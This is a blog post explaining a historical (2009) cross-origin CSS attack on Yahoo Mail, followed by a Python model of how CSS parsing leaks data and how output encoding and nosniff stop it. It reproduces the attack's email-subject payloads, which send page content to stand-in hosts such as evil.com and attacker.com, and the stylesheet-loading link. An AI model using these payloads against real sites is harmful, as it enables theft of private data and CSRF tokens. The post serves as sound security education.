Today I Learned - Rocky Kev

TIL CSS Vulnerability in Yahoo Mail

While reading Jake Archibald's article How to win at CORS, I learned about this amazing CSS exploit on Yahoo Mail servers.

CSS doesn't immediately fail on parse errors. In 2009 it turned out Yahoo Mail was vulnerable to a fairly simple exploit. The attacker sends the user one email with a subject including ');}, and later another with a subject including {}html{background:url('//evil.com/?

In 2009, Chris Evans published a description of the Cross Origin CSS technique for extracting private information from arbitrary sites, bypassing the Same Origin Policy by loading the target page of the attacked site as a CSS stylesheet. This technique was demonstrated using the example of Yahoo Mail:

  1. the attacker sends an email to the victim with the subject {}body{background:url('//attacker.com/?a= ; the {} construction clears all previous errors in the CSS parser, and the quotation mark ' is not closed.

  2. some time passes and the victim receives new emails

  3. then the attacker sends a new email to the victim with the subject ');}, in which he closes the quotation mark ' and ends the CSS style. In the text of the message, the attacker encourages the victim to click on the link leading to the attacker's website.

Thus, on the Yahoo Mail view page, the subject lines of the attacker's two emails formed a valid CSS rule:

{}body{background:url('//attacker/?a=%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3493_AGvHtEQAAWFgSgIzgAlWYQXHqDY&3=q%22%3ESuper%20sensitive%20subject%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3933_AGTHtEQAAM%2FHSgIzawpE8Fwm1%2FI&5=x%22%3E');}

and between the emails there was a piece of HTML code containing a CSRF token (the mid= parameter) and the header of another private email.

The attacker's website simply loads the Yahoo! Mail page containing the mail list as a CSS stylesheet:

<link type='text/css' rel='stylesheet' href='https://m.yahoo.com/mail'>

As a result, all information between the two "tagged subjects" is sent to the attacker's site by the background CSS property, which requests the external address given as the background image.

via Attacks: Cross Origin CSS
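To make the parser behaviour concrete, here is an added Python model (not code from this TIL, from Jake Archibald's article, from the Cross Origin CSS write-up or from Yahoo) of the two things the attack relies on: a CSS string token swallows everything up to the next matching quote, and a qualified rule whose prelude is not a selector is dropped whole, which is what the leading {} exploits. The inbox markup, the mid=CONSTRUCTED-TOKEN-n values, the host attacker.example and the three encoder functions are all constructed for the demo. The same page is then rendered with the subject's quote encoded as an HTML entity, the server-side defence: a CSS parser does not decode HTML entities, so &#x27; can neither open nor close a string.

```python
# Toy model of the cross-origin CSS attack above plus the output-encoding defence.
# Added example, not code from the TIL or from Yahoo: inbox markup, token values,
# attacker.example and the encoders are all constructed for the demo.
import html
import re

SIMPLE_SELECTOR = re.compile(r"^[A-Za-z][\w-]*$")  # enough selector grammar for the demo

def _read_string(css, i):
    """css[i] is a quote. A newline before the closing quote yields a bad-string;
    the closing quote or EOF ends the string (backslash escapes ignored here)."""
    q, j, n = css[i], i + 1, len(css)
    while j < n and css[j] != q:
        if css[j] == "\n":
            return ("bad-string", css[i:j]), j
        j += 1
    return ("string", css[i + 1:j]), j + 1

def _read_url(css, i):
    """css[i:] starts with 'url('. Quoted argument -> None (plain chars + a string
    token). Unquoted -> a url token; whitespace, quotes or '(' inside it make a
    bad-url, after which the tokenizer skips to the next ')' as CSS does."""
    n, j = len(css), i + 4
    while j < n and css[j].isspace():
        j += 1
    if j < n and css[j] in "'\"":
        return None
    k = j
    while k < n and css[k] != ")":
        if css[k].isspace() or css[k] in "'\"(":
            end = css.find(")", k)
            end = n if end == -1 else end + 1
            return ("bad-url", css[i:end]), end
        k += 1
    return ("url", css[j:k]), k + 1

def tokenize(css):
    """Yield ('string'|'bad-string'|'url'|'bad-url'|'char', text) tokens."""
    i, n = 0, len(css)
    while i < n:
        if css[i] in "'\"":
            tok, i = _read_string(css, i)
            yield tok
            continue
        if css[i:i + 4].lower() == "url(":
            found = _read_url(css, i)
            if found:
                tok, i = found
                yield tok
                continue
        yield ("char", css[i])
        i += 1

def _url_argument(value):
    """The url() argument of a declaration value, written url(x) or url('x')."""
    value = [t for t in value if not (t[0] == "char" and t[1].isspace())]
    if value and value[0][0] == "url":
        return value[0][1]
    head = "".join(t for k, t in value[:4] if k == "char").lower()
    if head == "url(" and len(value) > 4 and value[4][0] == "string":
        return value[4][1]
    return None

def _declarations(block):
    """Split a block on ';'; keep (property, url-argument) for every declaration
    that contains no bad-string or bad-url token."""
    decls, current = [], []
    for tok in block + [("char", ";")]:
        if tok != ("char", ";"):
            current.append(tok)
            continue
        bad = any(k in ("bad-string", "bad-url") for k, _ in current)
        if ("char", ":") in current and not bad:
            colon = current.index(("char", ":"))
            prop = "".join(t for _, t in current[:colon]).strip()
            decls.append((prop, _url_argument(current[colon + 1:])))
        current = []
    return decls

def parse_rules(css):
    """Rules a browser would keep: [(selector, [(property, url_or_None)])].
    A rule whose prelude is not a simple selector is dropped as a whole."""
    rules, prelude, block, depth = [], [], None, 0

    def finish():
        selector = "".join(t for _, t in prelude).strip()
        if all(k == "char" for k, _ in prelude) and SIMPLE_SELECTOR.match(selector):
            rules.append((selector, _declarations(block)))

    for tok in tokenize(css):
        if block is None:
            if tok == ("char", "{"):
                block = []
            else:
                prelude.append(tok)
        elif tok == ("char", "{"):
            depth += 1
            block.append(tok)
        elif tok == ("char", "}") and depth:
            depth -= 1
            block.append(tok)
        elif tok == ("char", "}"):
            finish()
            prelude, block = [], None
        else:
            block.append(tok)
    if block is not None:  # EOF closes an open block, as in CSS
        finish()
    return rules

def render_inbox(subjects, escape):
    """Constructed stand-in for a webmail inbox: one row per message, each link
    carrying a CSRF-style token (placeholder value); 'escape' encodes the subject."""
    rows = [f'<div class="row"><a href="/mail/read?mid=CONSTRUCTED-TOKEN-{i}">'
            f'{escape(s)}</a></div>' for i, s in enumerate(subjects)]
    return "<html><body>" + "".join(rows) + "</body></html>"

FIRST_SUBJECT = "{}body{background:url('//attacker.example/?a="
VICTIM_SUBJECT = "Super sensitive subject"
SECOND_SUBJECT = "');}"
ATTACK_INBOX = [FIRST_SUBJECT, VICTIM_SUBJECT, SECOND_SUBJECT]  # oldest first

def weak_escape(s):    # & < > only: quotes and braces reach the page unchanged
    return html.escape(s, quote=False)

def entity_escape(s):  # also encodes quotes, so no CSS string can open or close
    return html.escape(s, quote=True)

def strict_escape(s):  # every non-alphanumeric except space becomes a numeric entity
    return "".join(c if c.isalnum() or c == " " else f"&#{ord(c)};" for c in s)

def exfiltrated_urls(page):
    """URLs a browser would fetch if it applied this page as a stylesheet."""
    return [url for _, decls in parse_rules(page) for _, url in decls if url]
```

With the weak encoder the single kept rule is body{background:url('...')} and its url() argument carries the private row, token and subject included; with entity_escape the unquoted url token hits whitespace in the absorbed markup and becomes a bad-url, so the declaration is dropped, and with strict_escape no brace survives and no rule is formed at all. The browser-side fix that followed this report is not modelled: browsers now refuse to apply a cross-origin response as a stylesheet when its Content-Type is not text/css, and serving X-Content-Type-Options: nosniff makes that refusal unconditional.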
